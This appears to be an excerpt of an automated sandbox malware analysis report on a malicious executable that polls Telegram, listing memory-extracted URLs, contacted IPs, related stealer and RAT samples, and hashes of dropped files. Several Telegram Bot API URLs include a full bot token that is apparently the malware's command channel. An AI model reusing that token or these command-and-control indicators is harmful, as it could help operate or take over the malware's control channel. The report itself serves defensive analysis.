                                          https://oneget.orgXpowershell.exe, 00000001.00000002.4155343764.000001A33E6E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?powershell.exe, 00000004.00000002.4155912559.000001D5C0FDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0523000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://aka.ms/pscore68powershell.exe, 00000001.00000002.4155343764.000001A33D1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF1E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=124powershell.exe, 00000004.00000002.4155912559.000001D5C09F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=9894443powershell.exe, 00000004.00000002.4155912559.000001D5BF972000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://api.telegram.orgpowershell.exe, 00000004.00000002.4155912559.000001D5C10B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C12E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF8E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0B43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFACB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF9B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF9E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1275000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.4155343764.000001A33D1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF1E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6qmgr.db.6.drfalse
                                                          		high
                                                          https://oneget.orgpowershell.exe, 00000001.00000002.4155343764.000001A33E6E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.microspowershell.exe, 00000004.00000002.4212393855.000001D5D7272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              149.154.167.220
                                                              		unknownUnited Kingdom
                                                              		62041TELEGRAMRUfalse

                                                              Private

                                                              IP
                                                              127.0.0.1

                                                              General Information

                                                              Joe Sandbox version:42.0.0 Malachite
                                                              Analysis ID:1590581
                                                              Start date and time:2025-01-14 09:54:07 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 7m 55s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:13
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Sample name:12.exe
                                                              Detection:MAL
                                                              Classification:mal92.bank.evad.winEXE@22/48@0/2
                                                              EGA Information:
                                                              • Successful, ratio: 66.7%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 23
                                                              • Number of non-executed functions: 62
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Override analysis time to 240s for powershell

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 2.19.126.143, 2.19.126.149, 2.23.240.205, 52.22.41.97, 52.6.155.20, 3.233.129.217, 3.219.243.226, 172.64.41.3, 162.159.61.3, 184.28.90.27, 23.209.209.135, 199.232.210.172, 2.16.168.107, 2.16.168.105, 23.219.161.132, 192.168.2.4, 23.47.168.24, 20.12.23.50, 13.107.246.45
                                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                              • Execution Graph export aborted for target powershell.exe, PID 6648 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateFile calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              03:55:02API Interceptor11805290x Sleep call for process: powershell.exe modified
                                                              03:55:06API Interceptor3x Sleep call for process: svchost.exe modified
                                                              03:55:16API Interceptor2x Sleep call for process: AcroCEF.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              149.154.167.220PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                  ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                      Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                        PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                              https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                6uPVRnocVS.exeGet hashmaliciousDCRatBrowse

                                                                                  Domains

                                                                                  No context

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  TELEGRAMRUPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  http://bu9.fysou.web.id/webs6/cx.aktifkn.fiturrGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.164.13
                                                                                  http://bu9.fysou.web.id/webs6/aktrfn.fitur.pylterGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.164.13
                                                                                  Handler.exeGet hashmaliciousDanaBot, VidarBrowse
                                                                                  • 149.154.167.99
                                                                                  sysadmin.exeGet hashmaliciousVidarBrowse
                                                                                  • 149.154.167.99
                                                                                  JUbmpeT.exeGet hashmaliciousVidarBrowse
                                                                                  • 149.154.167.99
                                                                                  slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 149.154.167.220
                                                                                  ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  • 149.154.167.220
                                                                                  QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 149.154.167.220

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf8cedada, page size 16384, Windows version 10.0
                                                                                  Category:dropped
                                                                                  Size (bytes):1310720
                                                                                  Entropy (8bit):0.4221578435646777
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:3SB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:3azag03A2UrzJDO
                                                                                  MD5:678D008748CE16C433C07E0DD02241EA
                                                                                  SHA1:83BBB6FB699D7EF7C8E883002CE3ACB829DE9FAD
                                                                                  SHA-256:CFBB00BD78DCED6644FA66884B9DCC12EE22AD7401CA52C8B3D8E1D894E5EFD6
                                                                                  SHA-512:C85D8AB177A2099761C3FDDAA99091AAF44D38B0322212E1AFA51749051671A985DBD9729234AB2A28FB29094ECB5AFDD903579E393C1A908383E46BA369ABA5
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:....... .......Y.......X\...;...{......................n.%......:...}...7...}..h.#......:...}..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................DQ...:...}...................P-U.:...}...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
                                                                                  Category:dropped
                                                                                  Size (bytes):86016
                                                                                  Entropy (8bit):4.44489964864946
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:SeXci5tfiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:XUs3OazzU89UTTgUL
                                                                                  MD5:3FA323458CFB8ED199307081DF7C5846
                                                                                  SHA1:27B842DDB81C4EB4A8E73D2C08FE8E569994A121
                                                                                  SHA-256:28D3E57D2479F66EDDB41C30D166F22E0851E48660F122F58EBC1B7789F38496
                                                                                  SHA-512:BAACB8D86C9DD86CDB2EF8D0043AAAA7E4C94D42691DC38DD231F752DFBDAF4749B920ED5FB15C6E6E6E3CC8ECBCBEA7651D0173322A27A5C8EF63206539B3DB
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite Rollback Journal
                                                                                  Category:dropped
                                                                                  Size (bytes):8720
                                                                                  Entropy (8bit):2.214228912465633
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:7+tGkvnuwKzqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf98:7M5vnCzqvmFTIF3XmHjBoGGR+jMz+Lhi
                                                                                  MD5:B29368BB16172B30E33C32FD833723E1
                                                                                  SHA1:B001A095DE7B9F15D46EBF7434C9E0764A2B74C6
                                                                                  SHA-256:EF7866C9296912A5BEDF7DDBD6DF95DF8FA06282A4D83107BF68D211F79CAD5F
                                                                                  SHA-512:244D2AD811519CE528BD2DAB590527285EA3A2B4BA55861F3819F45E80009B24334349AE1C9AB3D0F97653D08D103AA5E291501E35475C8DA24EFE6BC3FE91DC
                                                                                  Malicious:false
                                                                                  Preview:.... .c.......}.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:Certificate, Version=3
                                                                                  Category:dropped
                                                                                  Size (bytes):1391
                                                                                  Entropy (8bit):7.705940075877404
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                  Malicious:false
                                                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                  Category:dropped
                                                                                  Size (bytes):71954
                                                                                  Entropy (8bit):7.996617769952133
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                  Malicious:false
                                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):192
                                                                                  Entropy (8bit):2.756901573172974
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:kkFkl5DCM1fllXlE/HT8kwzvNNX8RolJuRdxLlGB9lQRYwpDdt:kK232T8XVNMa8RdWBwRd
                                                                                  MD5:96F118677BB0473958ADFE6711ACFC67
                                                                                  SHA1:A8607246AD89718401159CDA66B7EA5D35DA6475
                                                                                  SHA-256:1AD0D77552514DB08F3516C5678DDCF68441231135E5D2A38552C71F1FA54EA2
                                                                                  SHA-512:1CF1E556C5EC30215F01C652BB4D1B32FD5EAB3E1381D382BF91FCAF3F77069E4CFE8192B9B671A974DBC1223909D4E9E2E47BA3B485C3C3915993E2974F68C7
                                                                                  Malicious:false
                                                                                  Preview:p...... ............bf..(....................................................... ..........W....m...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):328
                                                                                  Entropy (8bit):3.2441017925653757
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:kKmT9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:uqDImsLNkPlE99SNxAhUe/3
                                                                                  MD5:7F5F734D0D567ED4D5CA5AF80F06DC85
                                                                                  SHA1:88D6849C82D2C54A42F5BDF41A9DD81DF9CC8676
                                                                                  SHA-256:733B4668FC25C444E5E3038E1A32E4432E669EBB5D75FBB440A0CA11D8C52EF5
                                                                                  SHA-512:1C4FA31098B7ED2EC35ED2B60F6988D184DE6921D5907D801536FBB2250234896D4A6501FA408D4C61CF96A4985B5A7F224B5CC9BE7D061EEE156BAAD1DC8DB1
                                                                                  Malicious:false
                                                                                  Preview:p...... ........,.M.bf..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:PostScript document text
                                                                                  Category:dropped
                                                                                  Size (bytes):1233
                                                                                  Entropy (8bit):5.233980037532449
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                  Malicious:false
                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5264

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:PostScript document text
                                                                                  Category:dropped
                                                                                  Size (bytes):1233
                                                                                  Entropy (8bit):5.233980037532449
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                  Malicious:false
                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:PostScript document text
                                                                                  Category:dropped
                                                                                  Size (bytes):1233
                                                                                  Entropy (8bit):5.233980037532449
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                  Malicious:false
                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:PostScript document text
                                                                                  Category:dropped
                                                                                  Size (bytes):10880
                                                                                  Entropy (8bit):5.214360287289079
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                  Malicious:false
